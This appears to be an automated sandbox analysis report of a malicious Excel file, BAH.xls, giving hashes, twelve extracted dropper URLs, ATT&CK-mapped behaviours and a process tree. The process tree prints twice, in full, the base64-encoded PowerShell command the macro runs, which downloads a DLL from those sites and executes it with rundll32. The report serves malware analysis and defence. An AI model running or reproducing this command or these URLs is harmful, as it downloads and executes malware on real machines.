c433439befa9874ea6532f43760bfaf3ff5f76716229996c111b21e5b1641a7d

Analysis

max time kernel
148s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22/08/2024, 23:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

BAH.xls
Size

134KB
MD5

4fb20070ef46f4896c7aca0262e18ce6
SHA1

c3b5d217932b4f2c3ce765691103b14f1a4520e8
SHA256

c433439befa9874ea6532f43760bfaf3ff5f76716229996c111b21e5b1641a7d
SHA512

6d5221345d0d6e9520e996cd087aca43ce061256d1a908dc1e956c9440218b75322c15d71857bb869dfa2c1213a1872e0bb702da01ef47271f3d785200690987
SSDEEP

3072:NcKoSsxzNDZLDZjlbR868O8KlVH3jehvMqAPjxO5xyZUE5V5xtezEVg8/dg4Gx0G:NcKoSsxzNDZLDZjlbR868O8KlVH3jehn

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://tastedonline.com/cgi-bin/14Lg3P2Dt3rqBmaYZO/

exe.dropper

http://store.anicyber.com/wp-content/0JIWtpJt681mQ/

exe.dropper

http://jeffreylubin.igclout.com/wp-admin/gJ5oDbi/

exe.dropper

https://dulichkhampha24.net/wp-content/rPThO/

exe.dropper

http://dev.learncaraudio.com/wp-admin/ZIwWVcNiED4JYqnq/

exe.dropper

http://karensgardentips.com/cgi-bin/w9i3PIVDOJDeF095ST/

exe.dropper

http://stancewheels.com/wp-admin/ur031GNgTubBSslqN/

exe.dropper

http://laohange.com/wp-content/brPqH/

exe.dropper

http://139.99.89.211/wp-admin/VM1HRb3b0MGGdp/

exe.dropper

http://onexone.elementor.cloud/cdrxhrt/632SFiWmT1Y/

exe.dropper

https://lastregaristorante.com/wp-admin/vkXFRVu/

exe.dropper

http://sellin.app/wp-admin/0W4AcWvFkHkV/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4816	4760	cmd.exe	83

Blocklisted process makes network request 16 IoCs

flow	pid	Process
33	3448	powershell.exe
35	3448	powershell.exe
41	3448	powershell.exe
43	3448	powershell.exe
46	3448	powershell.exe
48	3448	powershell.exe
59	3448	powershell.exe
61	3448	powershell.exe
65	3448	powershell.exe
66	3448	powershell.exe
69	3448	powershell.exe
70	3448	powershell.exe
97	3448	powershell.exe
99	3448	powershell.exe
102	3448	powershell.exe
104	3448	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4760	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3448	powershell.exe
3448	powershell.exe
3448	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3448	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE
4760	EXCEL.EXE

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4760 wrote to memory of 4816	4760	EXCEL.EXE	87
PID 4760 wrote to memory of 4816	4760	EXCEL.EXE	87
PID 4816 wrote to memory of 4900	4816	cmd.exe	90
PID 4816 wrote to memory of 4900	4816	cmd.exe	90
PID 4816 wrote to memory of 3448	4816	cmd.exe	96
PID 4816 wrote to memory of 3448	4816	cmd.exe	96
PID 4816 wrote to memory of 5000	4816	cmd.exe	104
PID 4816 wrote to memory of 5000	4816	cmd.exe	104
PID 4816 wrote to memory of 5000	4816	cmd.exe	104

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\BAH.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3&start /B /WAIT powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwB0AGEAcwB0AGUAZABvAG4AbABpAG4AZQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADEANABMAGcAMwBQADIARAB0ADMAcgBxAEIAbQBhAFkAWgBPAC8ALABoAHQAdABwADoALwAvAHMAdABvAHIAZQAuAGEAbgBpAGMAeQBiAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADAASgBJAFcAdABwAEoAdAA2ADgAMQBtAFEALwAsAGgAdAB0AHAAOgAvAC8AagBlAGYAZgByAGUAeQBsAHUAYgBpAG4ALgBpAGcAYwBsAG8AdQB0AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBnAEoANQBvAEQAYgBpAC8ALABoAHQAdABwAHMAOgAvAC8AZAB1AGwAaQBjAGgAawBoAGEAbQBwAGgAYQAyADQALgBuAGUAdAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAFAAVABoAE8ALwAsAGgAdAB0AHAAOgAvAC8AZABlAHYALgBsAGUAYQByAG4AYwBhAHIAYQB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBaAEkAdwBXAFYAYwBOAGkARQBEADQASgBZAHEAbgBxAC8ALABoAHQAdABwADoALwAvAGsAYQByAGUAbgBzAGcAYQByAGQAZQBuAHQAaQBwAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB3ADkAaQAzAFAASQBWAEQATwBKAEQAZQBGADAAOQA1AFMAVAAvACwAaAB0AHQAcAA6AC8ALwBzAHQAYQBuAGMAZQB3AGgAZQBlAGwAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdQByADAAMwAxAEcATgBnAFQAdQBiAEIAUwBzAGwAcQBOAC8ALABoAHQAdABwADoALwAvAGwAYQBvAGgAYQBuAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGIAcgBQAHEASAAvACwAaAB0AHQAcAA6AC8ALwAxADMAOQAuADkAOQAuADgAOQAuADIAMQAxAC8AdwBwAC0AYQBkAG0AaQBuAC8AVgBNADEASABSAGIAMwBiADAATQBHAEcAZABwAC8ALABoAHQAdABwADoALwAvAG8AbgBlAHgAbwBuAGUALgBlAGwAZQBtAGUAbgB0AG8AcgAuAGMAbABvAHUAZAAvAGMAZAByAHgAaAByAHQALwA2ADMAMgBTAEYAaQBXAG0AVAAxAFkALwAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAcwB0AHIAZQBnAGEAcgBpAHMAdABvAHIAYQBuAHQAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBrAFgARgBSAFYAdQAvACwAaAB0AHQAcAA6AC8ALwBzAGUAbABsAGkAbgAuAGEAcABwAC8AdwBwAC0AYQBkAG0AaQBuAC8AMABXADQAQQBjAFcAdgBGAGsASABrAFYALwAiAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACAAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJABHAGQAcgBoAGsANAApAHsAJABoAGIAcgBrAGUAMgA9ACIAdgBiAGsAdwBrACIAOwAkAEcAcwBSAEUAdwB0ADQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABoAGQARwBlADUANQByAHUAcgA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAegBoAGQAawBqAGUAdwBcACIAKwAkAGgAYgByAGsAZQAyACsAIgAuAGQAbABsACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABzAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGgAZABHAGUANQA1AHIAdQByADsAaQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGgAZABHAGUANQA1AHIAdQByACkAewAgAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAJABoAGQARwBlADUANQByAHUAcgApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAIgArACIAbgBkAG8AdwBzAFwAcwB5AHMAdwBvACIAKwAiAHcANgA0AFwAcgB1AG4AZABsACIAKwAiAGwAMwAyAC4AZQB4AGUAIgA7ACQAYgBuAFoAUgA2ADUAZAA9ACQAaABkAEcAZQA1ADUAcgB1AHIAKwAiACwAZgAiACsAJABHAHMAUgBFAHcAdAA0ADsAYgByAGUAYQBrADsAfQB9AH0A&c:\programdata\vkwer.bat
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwB0AGEAcwB0AGUAZABvAG4AbABpAG4AZQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADEANABMAGcAMwBQADIARAB0ADMAcgBxAEIAbQBhAFkAWgBPAC8ALABoAHQAdABwADoALwAvAHMAdABvAHIAZQAuAGEAbgBpAGMAeQBiAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADAASgBJAFcAdABwAEoAdAA2ADgAMQBtAFEALwAsAGgAdAB0AHAAOgAvAC8AagBlAGYAZgByAGUAeQBsAHUAYgBpAG4ALgBpAGcAYwBsAG8AdQB0AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBnAEoANQBvAEQAYgBpAC8ALABoAHQAdABwAHMAOgAvAC8AZAB1AGwAaQBjAGgAawBoAGEAbQBwAGgAYQAyADQALgBuAGUAdAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAFAAVABoAE8ALwAsAGgAdAB0AHAAOgAvAC8AZABlAHYALgBsAGUAYQByAG4AYwBhAHIAYQB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBaAEkAdwBXAFYAYwBOAGkARQBEADQASgBZAHEAbgBxAC8ALABoAHQAdABwADoALwAvAGsAYQByAGUAbgBzAGcAYQByAGQAZQBuAHQAaQBwAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB3ADkAaQAzAFAASQBWAEQATwBKAEQAZQBGADAAOQA1AFMAVAAvACwAaAB0AHQAcAA6AC8ALwBzAHQAYQBuAGMAZQB3AGgAZQBlAGwAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdQByADAAMwAxAEcATgBnAFQAdQBiAEIAUwBzAGwAcQBOAC8ALABoAHQAdABwADoALwAvAGwAYQBvAGgAYQBuAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGIAcgBQAHEASAAvACwAaAB0AHQAcAA6AC8ALwAxADMAOQAuADkAOQAuADgAOQAuADIAMQAxAC8AdwBwAC0AYQBkAG0AaQBuAC8AVgBNADEASABSAGIAMwBiADAATQBHAEcAZABwAC8ALABoAHQAdABwADoALwAvAG8AbgBlAHgAbwBuAGUALgBlAGwAZQBtAGUAbgB0AG8AcgAuAGMAbABvAHUAZAAvAGMAZAByAHgAaAByAHQALwA2ADMAMgBTAEYAaQBXAG0AVAAxAFkALwAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAcwB0AHIAZQBnAGEAcgBpAHMAdABvAHIAYQBuAHQAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBrAFgARgBSAFYAdQAvACwAaAB0AHQAcAA6AC8ALwBzAGUAbABsAGkAbgAuAGEAcABwAC8AdwBwAC0AYQBkAG0AaQBuAC8AMABXADQAQQBjAFcAdgBGAGsASABrAFYALwAiAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACAAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJABHAGQAcgBoAGsANAApAHsAJABoAGIAcgBrAGUAMgA9ACIAdgBiAGsAdwBrACIAOwAkAEcAcwBSAEUAdwB0ADQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABoAGQARwBlADUANQByAHUAcgA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAegBoAGQAawBqAGUAdwBcACIAKwAkAGgAYgByAGsAZQAyACsAIgAuAGQAbABsACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABzAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGgAZABHAGUANQA1AHIAdQByADsAaQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGgAZABHAGUANQA1AHIAdQByACkAewAgAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAJABoAGQARwBlADUANQByAHUAcgApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAIgArACIAbgBkAG8AdwBzAFwAcwB5AHMAdwBvACIAKwAiAHcANgA0AFwAcgB1AG4AZABsACIAKwAiAGwAMwAyAC4AZQB4AGUAIgA7ACQAYgBuAFoAUgA2ADUAZAA9ACQAaABkAEcAZQA1ADUAcgB1AHIAKwAiACwAZgAiACsAJABHAHMAUgBFAHcAdAA0ADsAYgByAGUAYQBrADsAfQB9AH0A
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3448
- - \??\c:\windows\syswow64\rundll32.exe
    c:\windows\syswow64\rundll32.exe c:\programdata\zhdkjew\vbkwk.dll,dhSGert3
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ripghcmf.eyo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
cc787aae071f182b8d542505ae8ec896

SHA1
dde99d2c0a87d9f09cc9eb127d871b19e98e1c1e

SHA256
adec31d9651b48a256431b79246987435f894371b2c78b6c62512214421d0d4e

SHA512
b51e3ffa2881ccafaabc75916cce3e21d4e7c8cfe6591e0282ab4e002fb4889185875390b7690b57e5aabda3b9846388d322c2c7f47c14a5acfecb92cced51c4

Download Submit
\??\c:\programdata\vkwer.bat

Filesize
76B

MD5
07f0367074454ba87f5547a5f5df0176

SHA1
bfb6eecf1b518fd61e7abd2b9f77536dfba640a4

SHA256
8de89d16cc2a037d92dd615b86cc0ef9a51d5ffa80a303840eac20f4bf0108dc

SHA512
2b5e3236b3a3874a9c8169e237c7de39e06058cef47a5792251de354a947e81492c6a20efa3ece2ad40bafd75c628c0f68e5848e2d13232d21813cd685c6c8fb

Download Submit
\??\c:\programdata\zhdkjew\vbkwk.dll

Filesize
138KB

MD5
353b834697528bf08cf0f56145cbe686

SHA1
fe1c692222e14f6bf164cbcba2ed4862c2fccfb3

SHA256
ad084ce595f6c95b5165fb7adba503630639edd37553b9c9d3ee68f2ead79c96

SHA512
8bb52b4b2f165ad280f5800b80cee25b5ad991d969b3b10f12b1d2cd41713944d719ea1e6a876f1baa480a80ab661908f5e15ed2f069ce5d612fecb52a74045f

Download Submit
memory/3448-108-0x0000026279FC0000-0x000002627A766000-memory.dmp

Filesize
7.6MB

Download
memory/3448-82-0x0000026278AB0000-0x0000026278AD2000-memory.dmp

Filesize
136KB

Download
memory/4760-18-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-13-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-6-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-5-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-12-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-11-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-10-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-15-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-17-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-20-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-22-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-23-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-21-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-19-0x00007FFA83930000-0x00007FFA83940000-memory.dmp

Filesize
64KB

Download
memory/4760-1-0x00007FFAC60CD000-0x00007FFAC60CE000-memory.dmp

Filesize
4KB

Download
memory/4760-16-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-14-0x00007FFA83930000-0x00007FFA83940000-memory.dmp

Filesize
64KB

Download
memory/4760-7-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-34-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-75-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-8-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-9-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-89-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-91-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-90-0x00007FFAC60CD000-0x00007FFAC60CE000-memory.dmp

Filesize
4KB

Download
memory/4760-92-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-4-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-101-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download
memory/4760-2-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-3-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-0-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-126-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-127-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-129-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-128-0x00007FFA860B0000-0x00007FFA860C0000-memory.dmp

Filesize
64KB

Download
memory/4760-130-0x00007FFAC6030000-0x00007FFAC6225000-memory.dmp

Filesize
2.0MB

Download